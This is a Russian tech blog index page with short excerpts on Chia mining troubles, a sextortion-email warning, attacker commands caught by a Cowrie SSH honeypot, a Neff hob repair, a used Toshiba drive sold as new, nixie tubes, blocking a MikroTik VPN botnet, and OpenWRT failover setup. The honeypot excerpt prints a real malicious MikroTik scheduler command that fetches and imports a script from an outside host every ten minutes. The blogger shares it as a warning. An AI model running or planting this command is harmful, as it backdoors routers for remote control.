Chia зависло на подключение к кошельку

Интернет
Будь проклят тот день когда был запущен CHIA!

Сцука подорожали и исчезли все нормальные жесткие диски и SSD!!!

Ну и ладно всё бы хорошо, но эта зараза в один момент многочасового создания двух плотов взяла и зависла на надписи Подключение к кошельку. Какому нахер кошельку тебе надо подключаться в момент создания плотов? Всё остановилось! Но это гуавно продолжило жрать проц!
завис chia подключение к кошельку
Долбаная кривая бага это а не Chia!

И что в итоге? Нихрена она не подключилась к кошельку, а после перезарпуска ХЕР чего сохранилось!
Всё начинать заново
?

Развод Лохотрон. кривое и сырое chia!

Письма мошенников ЛОШАРИКОВ! У вас серьёзная проблема?

ХАЦКЕРЫ
Если Вам пришло подобное письмо, сообщение в соц сеть или мессенджер! Не ведитесь это мошенники !
100% Разводилово.
В противном случае должно быть какое-либо доказательство сказанного, а это обычный шаблон рассылка рассчитаное на лох0FF.

Пример письма
Здравствуйте!

Думаю Вас не очень обрадует то, что вы увидите дальше.
Дело вот в чём: через ваш роутер я подключился к вашей сети. Далее Я нашёл брешь в операционной системе вашего компьютера и залил свой код. Во всём виновата ваша любовь к жёсткой порнушке.

Читать дальше

Перехваченные комманды хацкеров в FAKE SSH Honeypot cowrie

ХАЦКЕРЫ

Это перехваченные комманды хацкеров через HONEYPOT COWRIE

ВВДИТЬ И ИСПОЛНЯТЬ ИХ НЕЛЬЗЯ!
перехвать хакерских комманд черезх эмулятор терминала SSH
Gерехвать хакерских комманд черезх эмулятор терминала SSH cowrie honeypot.

Микротиковский замес
/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://gamedate.xyz/poll/b94cc680-52b5-4c5a-92f0-37f0a1307729 mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write,1


и далее
Читать дальше

Neff - перестал работать сенсор на варочной панели T66TS61N0

РЕМОНТ и разборка
В ремонт попала Индукционная варочная панель NEFF T66TS61N0.
ремонт сенсора модели Встраиваемая Neff T66TS6RN0 Home Connect
Особенности модели
Встраиваемая
Цвет: черный
Ширина встраивания: 60 см
Количество зон нагрева: 4
Функция PanBoost
Управление TwistPad® Fire с таймером
Функция увеличения мощности PotBoost
Функция PowerMove
FlexZone
Зона FlexInduction
17 ступеней мощности
Мощность подключения: 7,4 кВт
Размеры прибора (ВxШxГ): 63,3 мм х 606 мм х 546 мм
Производитель: Испания

Модель снята с производства

Последователь: Neff T66TS6RN0 Home Connect

— — — и что с ней?

Особенность неисправности это перестал работать сенсор включения питания.


При сильном и долгом нажатии на сенсорную кнопку варочная панель T66TS61N0 включалась и работала.
Проблема прогрессировала с момента окончания гарантии NEFF.
Странно!

Читать дальше

Псевдоновый жесткий диск с алиэкспрес (TOSHIBA ОТЗЫВ)

На али существует магазин FIGHTING NATION Computer Store торгующий всякой электроникой для ПК, клавиатуры мышки и прочая ерунда.
Среди ассортимента есть интересная позиция.
Жесткий Диск TOSHIBA 2 ТБ, для бизнеса,SATA III 7200 об/мин 128 МБ Кэш 3,5 24/7 для DVR NVR видеонаблюдения
Вобщем энтерпрайз, значит можно использовать и в серваке.
Вот так выглядит. Цена около 4500р +- курс и распродажи.

Новые жесткие диски с алиэкспрес, не новые БУ

Читать дальше

Газоразрядные индикаторные лампы nixie и проблема изоляции проводников

Разное в электронике
Есть уникальный человек Dalibor Farný который создаёт газоразрядные индикаторы.
Nixie Tube & Clock Manufacturer.
Его канал в ютубе
www.youtube.com/channel/UC0IY1BQiMehWMvezqWLyk4g
Тут он запарился сиянием проводников идущих к индикатору внутри газоразрядной лампы в PROJECT H(x).
И правильно он сделал что начал искать ответ. Ибо сияние это не есть хорошо. Свечение в газоразрядных индикаторах должно быть там где оно должно быть.

газоразрядные лампы горит проводник
Читать дальше

Новые атаки GRE на VPN Микротик (pptp l2tp)

ХАЦКЕРЫ
Ботнет 92.63.194.0/24 GRE
Имея внешние ip адреса логах микротика периодически кто-то ломится. То в winbox, но он закрыт из вне, то в VPN. Сейчас капитально присосался какой-то ботнет с подсети 92.63.194.0/24
Что он делает?
Ломится подбирая нелепые логины, ну и ладно бы, но залипли установленные соединения и удалить их нельзя -они восстанавливаются.
впн микротик атаки GRE
Вот зараза !
92.63.194.155
92.63.194.158
92.63.194.156
92.63.194.40
92.63.194.91
92.63.194.35
92.63.194.69
92.63.194.41
92.63.194.155
92.63.194.93
92.63.194.92
92.63.194.159
92.63.194.157
Что делать?
Сперва добавлять нижеприведённые правила и шиться последней прошивкой.
/ip firewall raw
add action=drop chain=prerouting src-address-list=Botlist
/ip firewall address-list
add address=92.63.194.0/24 list=Botlist

Теперь осталось только ждать новых и добавлять их в Botlist

Резервный 3G 4G канал для OPENWRT

Интернет
модули
usb-modeswitch
kmod-usb-net-cdc-ether

Существуют такие моменты когда постоянный доступ к сети Интернет просто необходим, например для платёжных терминалов, ведь клиент всегда прав, а если он неможет оплатить картой то это уже беда, клиент потерян, негатив!
Для поддержания доступа к сети Интертет обычно используют резервный канал. Я использую как резервный мобильный Интернет через 3G-4G свисток) Обычный роутер с неофициальной прошивкой OPENWRT.
Можно было бы написать скрипт проверки доступности каналов, но проще использовать готовый вариант под названием mwan3
mwan3 буду ставить для ОПЕНВРТ 15.05.1
opkg update
opkg install ip iptables-mod-conntrack-extra iptables-mod-ipopt
opkg install mwan3_1.2-17_all.ipk

Installing mwan3 (1.6-2) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/mwan3_1.6-2_all.ipk.
Installing ip (4.0.0-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/ip_4.0.0-1_ar71xx.ipk.
Installing ipset (6.24-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/ipset_6.24-1_ar71xx.ipk.
Installing kmod-ipt-ipset (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-ipt-ipset_3.18.23-1_ar71xx.ipk.
Installing kmod-nfnetlink (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-nfnetlink_3.18.23-1_ar71xx.ipk.
Installing libmnl (1.0.3-2) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libmnl_1.0.3-2_ar71xx.ipk.
Installing iptables-mod-conntrack-extra (1.4.21-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/iptables-mod-conntrack-extra_1.4.21-1_ar71xx.ipk.
Installing kmod-ipt-conntrack-extra (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-ipt-conntrack-extra_3.18.23-1_ar71xx.ipk.
Installing iptables-mod-ipopt (1.4.21-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/iptables-mod-ipopt_1.4.21-1_ar71xx.ipk.
Installing kmod-ipt-ipopt (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-ipt-ipopt_3.18.23-1_ar71xx.ipk.
Configuring ip.
Configuring kmod-nfnetlink.
Configuring libmnl.
Configuring kmod-ipt-conntrack-extra.
Configuring kmod-ipt-ipopt.
Configuring iptables-mod-ipopt.
Configuring kmod-ipt-ipset.
Configuring ipset.
Configuring iptables-mod-conntrack-extra.
Configuring mwan3.

luci-app-mwan3

Installing luci-app-mwan3 (1.4-3) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/luci-app-mwan3_1.4-3_all.ipk.
Configuring luci-app-mwan3.

Для прохождения трафика PPTP установить kmod-nf-nathelper-extra
Для того чтобы появился в интрефейсах ВПН ppp-mod-pptp